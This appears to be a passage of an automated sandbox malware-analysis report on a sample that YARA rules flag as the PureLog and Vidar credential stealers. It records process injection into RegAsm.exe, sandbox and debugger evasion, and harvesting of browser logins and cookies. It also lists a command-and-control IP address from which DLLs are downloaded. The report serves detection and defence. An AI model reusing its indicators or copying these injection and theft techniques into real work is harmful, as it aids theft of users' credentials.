                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: RegAsm.exe, 00000001.00000002.2881580352.00000000031A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: RegAsm.exe, 00000001.00000002.2881580352.00000000031A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarer
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_1-80722
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004183AF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004183AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416676 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004041D4 _EH_prolog,GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_004041D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004183AF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004183AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041D468 SetUnhandledExceptionFilter,1_2_0041D468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004198D7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004198D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4942AF SetUnhandledExceptionFilter,1_2_1B4942AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B492C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_1B492C8E
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D69741 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_02D69741
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Searches for specific processes (likely to inject)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004101A9 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_004101A9
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 421000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 878008Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_0040ECD4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,1_2_1B492112
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,1_2_1B492112
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_1B66FF17
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_1B683300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_1B493AA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_1B682D38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_1B682DF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_1B682CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FB47 _EH_prolog,GetSystemTime,1_2_0040FB47
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040EBBA GetProcessHeap,HeapAlloc,GetUserNameA,1_2_0040EBBA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040EC81 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_0040EC81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: RegAsm.exe, 00000001.00000002.2881326562.0000000000E72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: file.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.file.exe.9a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1628578580.00000000009A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3d65570.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3d65570.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 3228, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5816, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5816, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: file.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.file.exe.9a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1628578580.00000000009A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3d65570.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3d65570.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 3228, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5816, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B50DB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,1_2_1B50DB10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B535910 sqlite3_mprintf,sqlite3_bind_int64,1_2_1B535910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5BD9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,1_2_1B5BD9E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B50DFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,1_2_1B50DFC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B511FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B511FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4A5C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,1_2_1B4A5C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B54D3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B54D3B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5351D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B5351D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B529090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,1_2_1B529090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B56D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B56D610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5355B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B5355B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5B14D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,1_2_1B5B14D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5BD4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,1_2_1B5BD4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4A4820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,1_2_1B4A4820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4C0FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,1_2_1B4C0FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B574D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,1_2_1B574D40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B508200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,1_2_1B508200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4E06E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,1_2_1B4E06E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4B8680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,1_2_1B4B8680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4E8550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,1_2_1B4E8550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B553770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B553770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5737E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B5737E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4BB400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,1_2_1B4BB400
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4EEF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,1_2_1B4EEF30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4FE200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,1_2_1B4FE200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B50E170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B50E170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4FE090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,1_2_1B4FE090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4A66C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,1_2_1B4A66C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B50A6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,1_2_1B50A6F0

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		Boot or Logon Initialization Scripts511
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing                  		NTDS44
                  System Information Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets141
                  Security Software Discovery                  		SSHKeylogging13
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion                  		DCSync12
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                  Process Injection                  		Proc Filesystem1
                  System Owner/User Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe63%ReversingLabsWin32.Trojan.Privateloader
                  file.exe42%VirustotalBrowse
                  file.exe100%AviraHEUR/AGEN.1323756
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll1%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  bg.microsoft.map.fastly.net0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://65.108.152.56:9000/nss3.dllData0%Avira URL Cloudsafe
                  https://65.108.152.56:90000%Avira URL Cloudsafe
                  https://65.108.152.56:9000/mozglue.dll0%Avira URL Cloudsafe
                  https://store.steampowered.comv0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/vcruntime140.dll0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/nss3.dll0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/nss3.dllft0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/softokn3.dllessionKeyBackward0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/nss3.dllU0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/freebl3.dll0%Avira URL Cloudsafe
                  https://65.108.152.56:9000el0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/o0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/W0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/msvcp140.dllt0%Avira URL Cloudsafe
                  https://65.108.152.56:90000%VirustotalBrowse
                  https://65.108.152.56:9000/G0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/D0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/soft0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/softokn3.dll0%Avira URL Cloudsafe
                  https://65.108.152.56:9000softokn3.dlldge0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/70%Avira URL Cloudsafe
                  https://65.108.152.56:9000/dZ0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/W9%VirustotalBrowse
                  https://65.108.152.56:9000/mozglue.dllEdge0%Avira URL Cloudsafe
                  https://65.108.152.56:9000ing0%Avira URL Cloudsafe
                  https://65.108.152.56/0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/sqlx.dllg0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/vcruntime140.dll_7)0%Avira URL Cloudsafe
                  https://65.108.152.56:9000lGoogle0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/0%VirustotalBrowse
                  https://65.108.152.56:9000/freebl3.dll40%Avira URL Cloudsafe
                  https://65.108.152.56:9000l0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/ng0%Avira URL Cloudsafe
                  https://65.108.152.56/0%VirustotalBrowse
                  https://65.108.152.56:9000/msvcp140.dll0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/D7%VirustotalBrowse
                  https://65.108.152.56:9000e1a3fmium0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/L~0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/sqlx.dll0%Avira URL Cloudsafe
                  https://65.108.152.56:9000/sqlx.dllg9%VirustotalBrowse
                  https://65.108.152.56:9000/sqlx.dll4%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.210.172
                  		truefalseunknown
                  steamcommunity.com
                  		104.105.90.131
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://steamcommunity.com/profiles/76561199680449169false
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabIEHJJE.1.drfalse
                        		high
                        https://duckduckgo.com/ac/?q=IEHJJE.1.drfalse
                          		high
                          https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                            		high
                            https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                              		high
                              https://store.steampowered.comvRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
